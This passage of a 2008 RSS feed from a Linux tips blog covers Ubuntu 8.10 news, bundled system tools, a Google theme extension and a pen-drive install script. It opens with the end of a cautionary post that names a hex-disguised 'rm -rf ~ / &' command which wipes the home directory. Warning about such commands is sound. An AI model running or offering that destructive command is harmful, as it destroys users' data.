<p>Well this is a hex coded version of <code><strong>rm -rf ~ / &amp;</strong></code> . This does nothing more than wiping off your home directory.</p>
<p>These are only a few guidelines you need to follow. If you know some more, drop them in comments.</p>
<p>If you want to learn Linux, conquer its power, have fun, and be productive, you need to be careful, helpful, and share your knowledge. If you have any knowledge on Linux that you want to share, let us know in comments or shoot me an email.</p>
<p>So what did you learn today?</p>
<p style="text-align: center;"></p>
<p><map name='google_ad_map_244_4dd546a088e8e37f'>
<area shape='rect' href='http://imageads.googleadservices.com/pagead/imgclick/244?pos=0' coords='1,2,367,28' />
<area shape='rect' href='http://services.google.com/feedback/abg' coords='384,10,453,23'/></map>
<img usemap='#google_ad_map_244_4dd546a088e8e37f' border='0' src='http://imageads.googleadservices.com/pagead/ads?format=468x30_aff_img&amp;client=&amp;channel=&amp;output=png&amp;cuid=244&amp;url= http%3A%2F%2Fwww.quicktweaks.com%2F2008%2F10%2F24%2Ffun-with-linux-commands-ii-with-power-comes-responsibility%2F' /></p>

<p>Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/11/01/fun-with-linux-commands-iii-being-productive/' rel='bookmark' title='Permanent Link: Fun with Linux Commands-III - Being productive'>Fun with Linux Commands-III - Being productive</a> <small>Happy Linux commanding! Who says Linux commands are just for...</small></li><li><a href='http://www.quicktweaks.com/2008/10/17/fun-with-linux-commands-i/' rel='bookmark' title='Permanent Link: Fun with Linux Commands-I'>Fun with Linux Commands-I</a> <small>Happy Linux Commanding! From now onwards I will be posting...</small></li><li><a href='http://www.quicktweaks.com/2008/10/01/power-of-wonderful-linux-terminal-10-challenges-for-windows-users/' rel='bookmark' title='Permanent Link: Power of Wonderful Linux Terminal - 10 Challenges for Windows Users'>Power of Wonderful Linux Terminal - 10 Challenges for Windows Users</a> <small>Enough said about Linux being free. You shouldn’t use anything...</small></li></ol></p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>
<p><a href="http://feeds.feedburner.com/~a/quicktweaks/myFe?a=H0ZJB2"><img src="http://feeds.feedburner.com/~a/quicktweaks/myFe?i=H0ZJB2" border="0"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=nljSM"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=nljSM" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=0A1Em"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=0A1Em" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=tLs4M"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=tLs4M" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=QBLUm"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=QBLUm" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/24/fun-with-linux-commands-ii-with-power-comes-responsibility/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.quicktweaks.com/2008/10/24/fun-with-linux-commands-ii-with-power-comes-responsibility/</feedburner:origLink></item>
		<item>
		<title>Ubuntu 8.10 RC1 is here</title>
		<link>http://feeds.feedburner.com/~r/quicktweaks/myFe/~3/430123249/</link>
		<comments>http://www.quicktweaks.com/2008/10/23/ubuntu-810-rc1-is-here/#comments</comments>
		<pubDate>Thu, 23 Oct 2008 23:38:11 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
		
		<category><![CDATA[Installation]]></category>

		<category><![CDATA[Linux]]></category>

		<category><![CDATA[rc]]></category>

		<category><![CDATA[release]]></category>

		<category><![CDATA[theme]]></category>

		<category><![CDATA[ubutnu]]></category>

		<category><![CDATA[USBLive]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=238</guid>
		<description><![CDATA[A week before the final release of Ubuntu 8.10, the guys at Canonical has released the last testing version RC1. Since this is only RC1, no changes in the features was expected. As discussed in my previous post, two system tools USBLive and System Cleaner, will be bundled with Ubuntu 8.10, change of the wallpaper, [...]


No related posts.]]></description>
			<content:encoded><![CDATA[<p>A week before the final release of Ubuntu 8.10, the guys at Canonical has released the last testing version RC1. Since this is only RC1, no changes in the features was expected. As discussed in my <a href="http://www.quicktweaks.com/2008/10/22/intrepid-ibex-to-be-bundled-with-two-more-system-tools/"  target="_blank">previous post</a>, two system tools USBLive and System Cleaner, will be bundled with Ubuntu 8.10, change of the wallpaper, integrating a new Dark Room theme are among the noticeable changes in this version. <a href="http://www.ubuntu.com/testing/intrepid/beta" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.ubuntu.com');" target="_blank">Get Ubuntu 8.10 RC1 from here.</a></p>
<p style="text-align: center;"><a href="http://www.quicktweaks.com/wp-content/uploads/2008/10/sc1.png" ><img class="size-thumbnail wp-image-240 aligncenter" title="sc1" src="http://www.quicktweaks.com/index.php?feedimage=wp-content/uploads/2008/10/sc1-150x150.png" alt="" width="150" height="150" /></a></p>
<p><map name='google_ad_map_238_4dd546a088e8e37f'>
<area shape='rect' href='http://imageads.googleadservices.com/pagead/imgclick/238?pos=0' coords='1,2,367,28' />
<area shape='rect' href='http://services.google.com/feedback/abg' coords='384,10,453,23'/></map>
<img usemap='#google_ad_map_238_4dd546a088e8e37f' border='0' src='http://imageads.googleadservices.com/pagead/ads?format=468x30_aff_img&amp;client=&amp;channel=&amp;output=png&amp;cuid=238&amp;url= http%3A%2F%2Fwww.quicktweaks.com%2F2008%2F10%2F23%2Fubuntu-810-rc1-is-here%2F' /></p>

<p>No related posts.</p>
<p><a href="http://feeds.feedburner.com/~a/quicktweaks/myFe?a=UWJrZX"><img src="http://feeds.feedburner.com/~a/quicktweaks/myFe?i=UWJrZX" border="0"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=FCaVM"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=FCaVM" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=ewh7m"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=ewh7m" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=igo0M"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=igo0M" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=v4Gtm"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=v4Gtm" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/23/ubuntu-810-rc1-is-here/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.quicktweaks.com/2008/10/23/ubuntu-810-rc1-is-here/</feedburner:origLink></item>
		<item>
		<title>Intrepid Ibex to be Bundled with Two More System Tools</title>
		<link>http://feeds.feedburner.com/~r/quicktweaks/myFe/~3/429118094/</link>
		<comments>http://www.quicktweaks.com/2008/10/22/intrepid-ibex-to-be-bundled-with-two-more-system-tools/#comments</comments>
		<pubDate>Thu, 23 Oct 2008 01:10:57 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
		
		<category><![CDATA[Uncategorized]]></category>

		<category><![CDATA[disk]]></category>

		<category><![CDATA[Installation]]></category>

		<category><![CDATA[Intrepid Ibex]]></category>

		<category><![CDATA[System]]></category>

		<category><![CDATA[tapt]]></category>

		<category><![CDATA[tools]]></category>

		<category><![CDATA[ubuntu]]></category>

		<category><![CDATA[usb]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=236</guid>
		<description><![CDATA[Intrepid Ibex, which is due to release on 30th of this month, will be packed with two very useful system tools.


Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/10/05/the-wallpapers-that-should-made-their-ways-to-intrepid-ibex/' rel='bookmark' title='Permanent Link: The wallpapers that should make their ways to Intrepid Ibex'>The wallpapers that should make their ways to Intrepid Ibex</a> <small>[Updated] No more discussion on the new wallpaper that is...</small></li><li><a href='http://www.quicktweaks.com/2008/10/20/three-easy-steps-to-make-a-pen/' rel='bookmark' title='Permanent Link: Three easy steps to carry Ubuntu 8.10 in a pen drive'>Three easy steps to carry Ubuntu 8.10 in a pen drive</a> <small>Spent countless hours figuring how to install Ubuntu to make...</small></li></ol>

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Canonical, the distributor of Ubuntu OS, is often blamed for not listening the community such as ignoring the request for changing/improving default appearance. But not this time. Ever since they launched <a title="brainstorm.ubuntu.com" href="http://brainstorm.ubuntu.com" onclick="javascript:pageTracker._trackPageview('/outbound/article/brainstorm.ubuntu.com');" target="_blank">brainstorm.ubuntu.com</a>, they have been very responsive about what the Ubuntu fans want. As a result of this Intrepid Ibex, which is due to release on 30th of this month, will be packed with two very useful system tools:</p>
<p style="text-align: center;"></p>
<p style="text-align: center;"><span id="more-236"></span></p>
<p>Just few days ago, I wrote a post on <a title="live USB Ubuntu disk in three easy steps" href="http://www.quicktweaks.com/2008/10/20/three-easy-steps-to-make-a-pen/"  target="_blank">making a live Ubuntu usb disk in three easy steps</a>. Integrating a live USB maker tool into Ubuntu default installation has been <a title="Live USB" href="http://brainstorm.ubuntu.com/idea/16/" onclick="javascript:pageTracker._trackPageview('/outbound/article/brainstorm.ubuntu.com');" target="_blank">one of the popular requests</a> on brainstorm site.</p>
<div id="attachment_232" class="wp-caption alignright" style="width: 234px"><a href="http://www.quicktweaks.com/wp-content/uploads/2008/10/screenshot-8.png" ><img class="size-medium wp-image-232" title="USBLive" src="http://www.quicktweaks.com/index.php?feedimage=wp-content/uploads/2008/10/screenshot-8-224x300.png" alt="USBLive Ubuntu" width="224" height="300" /></a><p class="wp-caption-text">USBLive Ubuntu</p></div>
<p>A new application USBLive has started showing up in Ibex beta. As you might have guessed, this handy tool helps you to make pizza. Just kidding! Of course, it allows you to make a USB bootable disk with Ubuntu in it. Just give the source image (.iso) file or insert a live CD, plug-in your USB drive, adjust the space to be reserved by the default installation, and click <em>Make Startup Disk</em>. How easy as that? You can access USBLive from <em>System&gt;Administration&gt;Create Startup</em> <em>Disk</em> menu</p>
<p style="text-align: center;">
<p style="text-align: center;">
<p style="text-align: center;">
<p style="text-align: center;">
<p style="text-align: center;">
<p style="text-align: center;">
<p style="text-align: center;"></p>
<p>Another system tool that has been included is <em>System Cleaner</em>. It cleans up your system to make it</p>
<div id="attachment_233" class="wp-caption alignright" style="width: 290px"><a href="http://www.quicktweaks.com/wp-content/uploads/2008/10/screenshot-7.png" ><img class="size-medium wp-image-233" title="Ubuntu System Cleaner" src="http://www.quicktweaks.com/index.php?feedimage=wp-content/uploads/2008/10/screenshot-7-280x300.png" alt="System Cleaner" width="280" height="300" /></a><p class="wp-caption-text">System Cleaner</p></div>
<p>&#8216;kinda-new&#8217;. You can clean all the installed applications or select only those which you are not going to use any more. Access System Cleaner from <em>Applications&gt;System Tools&gt;System</em> Cleaner menu At first, you might think removing the applications can already be done with <em>Add/Remove </em>tool. So, what&#8217;s the difference? Nothing! It just gives you a list of those applications which you have installed after running up Ubuntu for the first time. No confusions whatsoever. It comes very handy when, for an example, you don&#8217;t want to poke the default applications but only want to remove those non-sense applications which you gave try few days ago. BTW, if you want to track all you apt activities, the ever useful <a title="tapt" href="http://www.quicktweaks.com/tapt/"  target="_blank">tapt</a> is always there.</p>
<p><map name='google_ad_map_236_4dd546a088e8e37f'>
<area shape='rect' href='http://imageads.googleadservices.com/pagead/imgclick/236?pos=0' coords='1,2,367,28' />
<area shape='rect' href='http://services.google.com/feedback/abg' coords='384,10,453,23'/></map>
<img usemap='#google_ad_map_236_4dd546a088e8e37f' border='0' src='http://imageads.googleadservices.com/pagead/ads?format=468x30_aff_img&amp;client=&amp;channel=&amp;output=png&amp;cuid=236&amp;url= http%3A%2F%2Fwww.quicktweaks.com%2F2008%2F10%2F22%2Fintrepid-ibex-to-be-bundled-with-two-more-system-tools%2F' /></p>

<p>Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/10/05/the-wallpapers-that-should-made-their-ways-to-intrepid-ibex/' rel='bookmark' title='Permanent Link: The wallpapers that should make their ways to Intrepid Ibex'>The wallpapers that should make their ways to Intrepid Ibex</a> <small>[Updated] No more discussion on the new wallpaper that is...</small></li><li><a href='http://www.quicktweaks.com/2008/10/20/three-easy-steps-to-make-a-pen/' rel='bookmark' title='Permanent Link: Three easy steps to carry Ubuntu 8.10 in a pen drive'>Three easy steps to carry Ubuntu 8.10 in a pen drive</a> <small>Spent countless hours figuring how to install Ubuntu to make...</small></li></ol></p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>
<p><a href="http://feeds.feedburner.com/~a/quicktweaks/myFe?a=fWwdy6"><img src="http://feeds.feedburner.com/~a/quicktweaks/myFe?i=fWwdy6" border="0"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=hV6WM"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=hV6WM" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=ViQ8m"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=ViQ8m" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=T2oWM"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=T2oWM" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=ftU1m"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=ftU1m" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/22/intrepid-ibex-to-be-bundled-with-two-more-system-tools/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.quicktweaks.com/2008/10/22/intrepid-ibex-to-be-bundled-with-two-more-system-tools/</feedburner:origLink></item>
		<item>
		<title>Pimp your Google with GoogleRedesigned</title>
		<link>http://feeds.feedburner.com/~r/quicktweaks/myFe/~3/427085821/</link>
		<comments>http://www.quicktweaks.com/2008/10/20/pimp-your-google-with-googleredesigned/#comments</comments>
		<pubDate>Tue, 21 Oct 2008 04:05:47 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
		
		<category><![CDATA[General]]></category>

		<category><![CDATA[google]]></category>

		<category><![CDATA[Design]]></category>

		<category><![CDATA[extension]]></category>

		<category><![CDATA[firefox]]></category>

		<category><![CDATA[flock]]></category>

		<category><![CDATA[theme]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=223</guid>
		<description><![CDATA[Got bored of those dull Google colors and themes? GoogleRedisgned is a Firefox/Flock extension which gives a totally new look to some of the Google products such as Gmail and GCalendar.


Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/10/16/welcome-a-new-theme-in-ubuntu-810/' rel='bookmark' title='Permanent Link: Welcome a New Theme in Ubuntu 8.10'>Welcome a New Theme in Ubuntu 8.10</a> <small>A new theme "Dark Room" has been added to Ubuntu...</small></li><li><a href='http://www.quicktweaks.com/2008/10/02/ubuntu-810-beta-hits-beta-the-look-lets-the-fans-down-again/' rel='bookmark' title='Permanent Link: Ubuntu 8.10 hits beta; the look lets the fans down again'>Ubuntu 8.10 hits beta; the look lets the fans down again</a> <small>Ubuntu 8.10 intrepid Ibex beta hit the market today but...</small></li></ol>

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Got bored of those dull Google colors and themes? GoogleRedisgned is a Firefox/Flock extension which gives a totally new look to some of the Google products such as Gmail and GCalendar. Check these screenshots:</p>
<p style="text-align: center;"></p>
<div id="attachment_226" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.quicktweaks.com/wp-content/uploads/2008/10/screenshot-6.png" ><img class="size-medium wp-image-226" title="gmail progress bar" src="http://www.quicktweaks.com/index.php?feedimage=wp-content/uploads/2008/10/screenshot-6-300x206.png" alt="Gmail progress bar" width="300" height="206" /></a><p class="wp-caption-text">Gmail progress bar</p></div>
<p><span id="more-223"></span></p>
<div id="attachment_225" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.quicktweaks.com/wp-content/uploads/2008/10/screenshot-5.png" ><img class="size-medium wp-image-225" title="gmail login box" src="http://www.quicktweaks.com/index.php?feedimage=wp-content/uploads/2008/10/screenshot-5-300x233.png" alt="Gmail login box" width="300" height="233" /></a><p class="wp-caption-text">Gmail login box</p></div>
<div id="attachment_224" class="wp-caption aligncenter" style="width: 310px"><a href="http://www.quicktweaks.com/wp-content/uploads/2008/10/screenshot-4.png" ><img class="size-medium wp-image-224" title="Gmail Inbox" src="http://www.quicktweaks.com/index.php?feedimage=wp-content/uploads/2008/10/screenshot-4-300x160.png" alt="Gmail Inbox" width="300" height="160" /></a><p class="wp-caption-text">Gmail Inbox</p></div>
<p>Impressed? If yes than you might want to try it out, <a title="Install Redigned Google extension" href="http://www.globexdesigns.com/gr/Google_Redesigned_0.1.xpi" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.globexdesigns.com');" target="_blank">install Google</a><a title="Install Redigned Google extension" href="http://www.globexdesigns.com/gr/Google_Redesigned_0.1.xpi" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.globexdesigns.com');" target="_blank">Redesigned </a> extension from the <a title="GoogleRedesigned homepage" href="http://www.globexdesigns.com/gr/" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.globexdesigns.com');" target="_blank">extension&#8217;s homepage</a>.</p>
<p style="text-align: center;"></p>
<p>[via: <a title="GoogleRedesigned homepage" href="http://www.globexdesigns.com/gr/" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.globexdesigns.com');" target="_self">globexdesigns.com</a>. Thanks to Sash for the link.]</p>
<p><map name='google_ad_map_223_4dd546a088e8e37f'>
<area shape='rect' href='http://imageads.googleadservices.com/pagead/imgclick/223?pos=0' coords='1,2,367,28' />
<area shape='rect' href='http://services.google.com/feedback/abg' coords='384,10,453,23'/></map>
<img usemap='#google_ad_map_223_4dd546a088e8e37f' border='0' src='http://imageads.googleadservices.com/pagead/ads?format=468x30_aff_img&amp;client=&amp;channel=&amp;output=png&amp;cuid=223&amp;url= http%3A%2F%2Fwww.quicktweaks.com%2F2008%2F10%2F20%2Fpimp-your-google-with-googleredesigned%2F' /></p>

<p>Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/10/16/welcome-a-new-theme-in-ubuntu-810/' rel='bookmark' title='Permanent Link: Welcome a New Theme in Ubuntu 8.10'>Welcome a New Theme in Ubuntu 8.10</a> <small>A new theme "Dark Room" has been added to Ubuntu...</small></li><li><a href='http://www.quicktweaks.com/2008/10/02/ubuntu-810-beta-hits-beta-the-look-lets-the-fans-down-again/' rel='bookmark' title='Permanent Link: Ubuntu 8.10 hits beta; the look lets the fans down again'>Ubuntu 8.10 hits beta; the look lets the fans down again</a> <small>Ubuntu 8.10 intrepid Ibex beta hit the market today but...</small></li></ol></p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>
<p><a href="http://feeds.feedburner.com/~a/quicktweaks/myFe?a=nAv9yZ"><img src="http://feeds.feedburner.com/~a/quicktweaks/myFe?i=nAv9yZ" border="0"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=OzeaM"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=OzeaM" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=gBJYm"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=gBJYm" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=WCrKM"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=WCrKM" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=qljHm"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=qljHm" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/20/pimp-your-google-with-googleredesigned/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.quicktweaks.com/2008/10/20/pimp-your-google-with-googleredesigned/</feedburner:origLink></item>
		<item>
		<title>Three easy steps to carry Ubuntu 8.10 in a pen drive</title>
		<link>http://feeds.feedburner.com/~r/quicktweaks/myFe/~3/426864419/</link>
		<comments>http://www.quicktweaks.com/2008/10/20/three-easy-steps-to-make-a-pen/#comments</comments>
		<pubDate>Mon, 20 Oct 2008 22:26:57 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
		
		<category><![CDATA[Installation]]></category>

		<category><![CDATA[Linux]]></category>

		<category><![CDATA[Software]]></category>

		<category><![CDATA[mobile]]></category>

		<category><![CDATA[pen drive]]></category>

		<category><![CDATA[ubuntu]]></category>

		<category><![CDATA[usb]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=218</guid>
		<description><![CDATA[Spent countless hours figuring how to install Ubuntu to make use of those extra GBs in your pen drive? It just need three easy steps.


Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/10/14/run-your-virtual-os-directly-from-gdm-in-ubuntu/' rel='bookmark' title='Permanent Link: Run your virtual OS directly from GDM in Ubuntu'>Run your virtual OS directly from GDM in Ubuntu</a> <small>If you regularly run a couple of OS from your...</small></li><li><a href='http://www.quicktweaks.com/2008/10/17/linux-talks-they-talked-about-linux/' rel='bookmark' title='Permanent Link: Linux Talks: They talked about Linux'>Linux Talks: They talked about Linux</a> <small>Hey Tux lovers, here are some good articles: Advanced Tips...</small></li><li><a href='http://www.quicktweaks.com/2008/04/10/video-voice-chating-in-ubuntu/' rel='bookmark' title='Permanent Link: Video &#038; Voice Chating in Ubuntu'>Video &#038; Voice Chating in Ubuntu</a> <small>In this article I will show you how to make...</small></li></ol>

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Spent countless hours figuring how to install Ubuntu to make use of those extra GBs in your pen drive? pendrivelinux.com has got everything done for you. All you lazy folks have to do is:</p>
<p><span id="more-218"></span></p>
<p style="text-align: center;"></p>
<p><span style="color: #ff6600;">1. Boot from you Ubuntu 8.10 live CD.</span></p>
<p><span style="color: #ff6600;">2. Plug in your pen drive, open a Terminal and issue following commands:</span><br />
<code><br />
$ wget pendrivelinux.com/downloads/u810/u810.sh</code></p>
<p>$ chmod +x u810.sh &amp;&amp; sh u810.sh</p>
<p><span style="color: #ff6600;">3. Follow the online instructions and reboot your system, change the BIOS setting so that your system boots up from a USB drive.</span></p>
<p>That&#8217;s it!</p>
<p>For complete step-by-step instructions and buy them a cup of coffee, visit <a title="pendrivelinux.com" href="http://www.pendrivelinux.com/2008/10/15/ubuntu-810-persistent-flash-drive-install-from-live-cd/" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.pendrivelinux.com');" target="_blank">pendrivelinux.com</a></p>
<p style="text-align: left;">[via: <a title="pendrivelinux.com" href="http://www.pendrivelinux.com/2008/10/15/ubuntu-810-persistent-flash-drive-install-from-live-cd/" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.pendrivelinux.com');" target="_blank">http://www.pendrivelinux.com/2008/10/15/ubuntu-810-persistent-flash-drive-install-from-live-cd/</a>]</p>
<p style="text-align: center;"></p>
<p><map name='google_ad_map_218_4dd546a088e8e37f'>
<area shape='rect' href='http://imageads.googleadservices.com/pagead/imgclick/218?pos=0' coords='1,2,367,28' />
<area shape='rect' href='http://services.google.com/feedback/abg' coords='384,10,453,23'/></map>
<img usemap='#google_ad_map_218_4dd546a088e8e37f' border='0' src='http://imageads.googleadservices.com/pagead/ads?format=468x30_aff_img&amp;client=&amp;channel=&amp;output=png&amp;cuid=218&amp;url= http%3A%2F%2Fwww.quicktweaks.com%2F2008%2F10%2F20%2Fthree-easy-steps-to-make-a-pen%2F' /></p>

<p>Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/10/14/run-your-virtual-os-directly-from-gdm-in-ubuntu/' rel='bookmark' title='Permanent Link: Run your virtual OS directly from GDM in Ubuntu'>Run your virtual OS directly from GDM in Ubuntu</a> <small>If you regularly run a couple of OS from your...</small></li><li><a href='http://www.quicktweaks.com/2008/10/17/linux-talks-they-talked-about-linux/' rel='bookmark' title='Permanent Link: Linux Talks: They talked about Linux'>Linux Talks: They talked about Linux</a> <small>Hey Tux lovers, here are some good articles: Advanced Tips...</small></li><li><a href='http://www.quicktweaks.com/2008/04/10/video-voice-chating-in-ubuntu/' rel='bookmark' title='Permanent Link: Video &#038; Voice Chating in Ubuntu'>Video &#038; Voice Chating in Ubuntu</a> <small>In this article I will show you how to make...</small></li></ol></p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>
<p><a href="http://feeds.feedburner.com/~a/quicktweaks/myFe?a=NcabO8"><img src="http://feeds.feedburner.com/~a/quicktweaks/myFe?i=NcabO8" border="0"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=g80qM"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=g80qM" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=iGOvm"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=iGOvm" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=8fLWM"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=8fLWM" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=xMCSm"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=xMCSm" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/20/three-easy-steps-to-make-a-pen/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.quicktweaks.com/2008/10/20/three-easy-steps-to-make-a-pen/</feedburner:origLink></item>
		<item>
		<title>Linux Talks: They talked about Linux</title>
		<link>http://feeds.feedburner.com/~r/quicktweaks/myFe/~3/424297038/</link>
		<comments>http://www.quicktweaks.com/2008/10/17/linux-talks-they-talked-about-linux/#comments</comments>
		<pubDate>Sat, 18 Oct 2008 04:21:19 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
		
		<category><![CDATA[Linux]]></category>

		<category><![CDATA[Linux Talks]]></category>

		<category><![CDATA[articles]]></category>

		<category><![CDATA[links]]></category>

		<category><![CDATA[talks]]></category>

		<category><![CDATA[Tux]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=215</guid>
		<description><![CDATA[Hey Tux lovers, here are some good articles:

Advanced Tips For The ps Command
How to Find duplicate copies of files Using fdupes in Ubuntu
Ubuntu 8.10 Coming Soon
5 Things I Wish Linux Had
Making The Switch To Linux - Keep In Mind … (10 Ubuntu Tips)
Three Cool 3D Car Racing Games for Linux
Quick Look at KDE 4.2-SVN
Switch to [...]


Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/10/24/linux-talks-they-talked-about-linux-2/' rel='bookmark' title='Permanent Link: Linux Talks: They talked about Linux'>Linux Talks: They talked about Linux</a> <small>Some links for this weekend: 5 Wallpaper Changer Apps For...</small></li><li><a href='http://www.quicktweaks.com/2008/10/01/power-of-wonderful-linux-terminal-10-challenges-for-windows-users/' rel='bookmark' title='Permanent Link: Power of Wonderful Linux Terminal - 10 Challenges for Windows Users'>Power of Wonderful Linux Terminal - 10 Challenges for Windows Users</a> <small>Enough said about Linux being free. You shouldn’t use anything...</small></li><li><a href='http://www.quicktweaks.com/2008/10/12/switch-to-linux-today-bsod-linux-flier/' rel='bookmark' title='Permanent Link: Switch to Linux Today! bsod Linux Flier'>Switch to Linux Today! bsod Linux Flier</a> <small>There are many reasons to switch to Linux, but this...</small></li></ol>

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Hey Tux lovers, here are some good articles:</p>
<ul>
<li><span style="color: #ff6600;"><a href="http://www.linuxplanet.com/linuxplanet/tutorials/6558/1/" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.linuxplanet.com');" target="_blank">Advanced Tips For The ps Command</a></span></li>
<li><span style="color: #ff6600;"><a href="http://www.ubuntugeek.com/how-to-find-duplicate-copies-of-files-using-fdupes-in-ubuntu.html" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.ubuntugeek.com');" target="_blank">How to Find duplicate copies of files Using fdupes in Ubuntu</a></span></li>
<li><span style="color: #ff6600;"><a href="http://www.pcmech.com/article/ubuntu-810-coming-soon/" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.pcmech.com');" target="_blank">Ubuntu 8.10 Coming Soon</a></span></li>
<li><span style="color: #ff6600;"><a href="http://www.daniweb.com/blogs/entry3288.html" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.daniweb.com');" target="_blank">5 Things I Wish Linux Had</a></span></li>
<li><span style="color: #ff6600;"><a href="http://www.mattiasgeniar.be/linux/making-the-switch-to-linux-keep-in-mind-10-ubuntu-tips/" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.mattiasgeniar.be');" target="_blank">Making The Switch To Linux - Keep In Mind … (10 Ubuntu Tips)</a></span></li>
<li><span style="color: #ff6600;"><a href="http://www.junauza.com/2008/10/three-cool-3d-car-racing-games-for.html" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.junauza.com');" target="_blank">Three Cool 3D Car Racing Games for Linux</a></span></li>
